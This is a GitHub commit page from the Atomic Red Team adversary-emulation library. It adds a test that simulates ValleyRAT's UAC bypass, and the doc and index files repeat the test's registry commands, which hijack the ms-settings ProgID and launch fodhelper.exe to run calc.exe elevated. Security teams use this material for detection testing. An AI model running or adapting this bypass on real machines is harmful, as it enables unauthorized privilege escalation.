Skip to content

Commit

Permalink
Generated docs from job=generate-docs branch=master [ci skip]
Browse files Browse the repository at this point in the history
  • Loading branch information
Atomic Red Team doc generator committed Sep 24, 2024
1 parent df25f7e commit 8366cf4
Show file tree
Hide file tree
Showing 10 changed files with 131 additions and 3 deletions.
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

# Atomic Red Team

![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1643-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1644-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Expand Down

Large diffs are not rendered by default.

Large diffs are not rendered by default.

2 changes: 2 additions & 0 deletions atomics/Indexes/Indexes-CSV/index.csv
Original file line number Diff line number Diff line change
Expand Up @@ -65,6 +65,7 @@ defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,24,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,85f3a526-4cfa-4fe7-98c1-dea99be025c7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,25,Disable UAC notification via registry keys,160a7c77-b00e-4111-9e45-7c2a44eda3fd,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,26,Disable ConsentPromptBehaviorAdmin via registry keys,a768aaa2-2442-475c-8990-69cf33af0f4e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,27,UAC bypassed by Utilizing ProgIDs registry.,b6f4645c-34ea-4c7c-98f2-d5a2747efb08,command_prompt
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
Expand Down Expand Up @@ -685,6 +686,7 @@ privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Ac
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,24,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,85f3a526-4cfa-4fe7-98c1-dea99be025c7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,25,Disable UAC notification via registry keys,160a7c77-b00e-4111-9e45-7c2a44eda3fd,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,26,Disable ConsentPromptBehaviorAdmin via registry keys,a768aaa2-2442-475c-8990-69cf33af0f4e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,27,UAC bypassed by Utilizing ProgIDs registry.,b6f4645c-34ea-4c7c-98f2-d5a2747efb08,command_prompt
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
Expand Down
2 changes: 2 additions & 0 deletions atomics/Indexes/Indexes-CSV/windows-index.csv
Original file line number Diff line number Diff line change
Expand Up @@ -44,6 +44,7 @@ defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,24,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,85f3a526-4cfa-4fe7-98c1-dea99be025c7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,25,Disable UAC notification via registry keys,160a7c77-b00e-4111-9e45-7c2a44eda3fd,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,26,Disable ConsentPromptBehaviorAdmin via registry keys,a768aaa2-2442-475c-8990-69cf33af0f4e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,27,UAC bypassed by Utilizing ProgIDs registry.,b6f4645c-34ea-4c7c-98f2-d5a2747efb08,command_prompt
defense-evasion,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
Expand Down Expand Up @@ -482,6 +483,7 @@ privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Ac
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,24,Disable UAC - Switch to the secure desktop when prompting for elevation via registry key,85f3a526-4cfa-4fe7-98c1-dea99be025c7,powershell
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,25,Disable UAC notification via registry keys,160a7c77-b00e-4111-9e45-7c2a44eda3fd,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,26,Disable ConsentPromptBehaviorAdmin via registry keys,a768aaa2-2442-475c-8990-69cf33af0f4e,command_prompt
privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,27,UAC bypassed by Utilizing ProgIDs registry.,b6f4645c-34ea-4c7c-98f2-d5a2747efb08,command_prompt
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
Expand Down
2 changes: 2 additions & 0 deletions atomics/Indexes/Indexes-Markdown/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -83,6 +83,7 @@
- Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
- Atomic Test #25: Disable UAC notification via registry keys [windows]
- Atomic Test #26: Disable ConsentPromptBehaviorAdmin via registry keys [windows]
- Atomic Test #27: UAC bypassed by Utilizing ProgIDs registry. [windows]
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Sudo usage (freebsd) [linux]
Expand Down Expand Up @@ -895,6 +896,7 @@
- Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
- Atomic Test #25: Disable UAC notification via registry keys [windows]
- Atomic Test #26: Disable ConsentPromptBehaviorAdmin via registry keys [windows]
- Atomic Test #27: UAC bypassed by Utilizing ProgIDs registry. [windows]
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Sudo usage (freebsd) [linux]
Expand Down
2 changes: 2 additions & 0 deletions atomics/Indexes/Indexes-Markdown/windows-index.md
Original file line number Diff line number Diff line change
Expand Up @@ -59,6 +59,7 @@
- Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
- Atomic Test #25: Disable UAC notification via registry keys [windows]
- Atomic Test #26: Disable ConsentPromptBehaviorAdmin via registry keys [windows]
- Atomic Test #27: UAC bypassed by Utilizing ProgIDs registry. [windows]
- [T1542.001 Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md)
- Atomic Test #1: UEFI Persistence via Wpbbin.exe File Creation [windows]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
Expand Down Expand Up @@ -645,6 +646,7 @@
- Atomic Test #24: Disable UAC - Switch to the secure desktop when prompting for elevation via registry key [windows]
- Atomic Test #25: Disable UAC notification via registry keys [windows]
- Atomic Test #26: Disable ConsentPromptBehaviorAdmin via registry keys [windows]
- Atomic Test #27: UAC bypassed by Utilizing ProgIDs registry. [windows]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
Expand Down
40 changes: 40 additions & 0 deletions atomics/Indexes/index.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -3047,6 +3047,26 @@ defense-evasion:

'
name: command_prompt
- name: UAC bypassed by Utilizing ProgIDs registry.
auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
description: 'This atomic designed to simulate the UAC bypassed made by ValleyRAT
by adding customized ProgIDs registry entry.

'
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f

echo Triggering fodhelper.exe for potential privilege escalation...
start fodhelper.exe
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
name: command_prompt
T1548.003:
technique:
x_mitre_platforms:
Expand Down Expand Up @@ -34445,6 +34465,26 @@ privilege-escalation:

'
name: command_prompt
- name: UAC bypassed by Utilizing ProgIDs registry.
auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
description: 'This atomic designed to simulate the UAC bypassed made by ValleyRAT
by adding customized ProgIDs registry entry.

'
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f

echo Triggering fodhelper.exe for potential privilege escalation...
start fodhelper.exe
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
name: command_prompt
T1548.003:
technique:
x_mitre_platforms:
Expand Down
40 changes: 40 additions & 0 deletions atomics/Indexes/windows-index.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -2392,6 +2392,26 @@ defense-evasion:

'
name: command_prompt
- name: UAC bypassed by Utilizing ProgIDs registry.
auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
description: 'This atomic designed to simulate the UAC bypassed made by ValleyRAT
by adding customized ProgIDs registry entry.

'
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f

echo Triggering fodhelper.exe for potential privilege escalation...
start fodhelper.exe
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
name: command_prompt
T1548.003:
technique:
x_mitre_platforms:
Expand Down Expand Up @@ -28879,6 +28899,26 @@ privilege-escalation:

'
name: command_prompt
- name: UAC bypassed by Utilizing ProgIDs registry.
auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
description: 'This atomic designed to simulate the UAC bypassed made by ValleyRAT
by adding customized ProgIDs registry entry.

'
supported_platforms:
- windows
executor:
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f

echo Triggering fodhelper.exe for potential privilege escalation...
start fodhelper.exe
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
name: command_prompt
T1548.003:
technique:
x_mitre_platforms:
Expand Down
40 changes: 40 additions & 0 deletions atomics/T1548.002/T1548.002.md
Original file line number Diff line number Diff line change
Expand Up @@ -64,6 +64,8 @@ Another bypass is possible through some lateral movement techniques if credentia

- [Atomic Test #26 - Disable ConsentPromptBehaviorAdmin via registry keys](#atomic-test-26---disable-consentpromptbehavioradmin-via-registry-keys)

- [Atomic Test #27 - UAC bypassed by Utilizing ProgIDs registry.](#atomic-test-27---uac-bypassed-by-utilizing-progids-registry)


<br/>

Expand Down Expand Up @@ -1292,4 +1294,42 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v Cons



<br/>
<br/>

## Atomic Test #27 - UAC bypassed by Utilizing ProgIDs registry.
This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry.

**Supported Platforms:** Windows


**auto_generated_guid:** b6f4645c-34ea-4c7c-98f2-d5a2747efb08






#### Attack Commands: Run with `command_prompt`!


```cmd
reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f
echo Triggering fodhelper.exe for potential privilege escalation...
start fodhelper.exe
```

#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
```





<br/>

0 comments on commit 8366cf4

Please sign in to comment.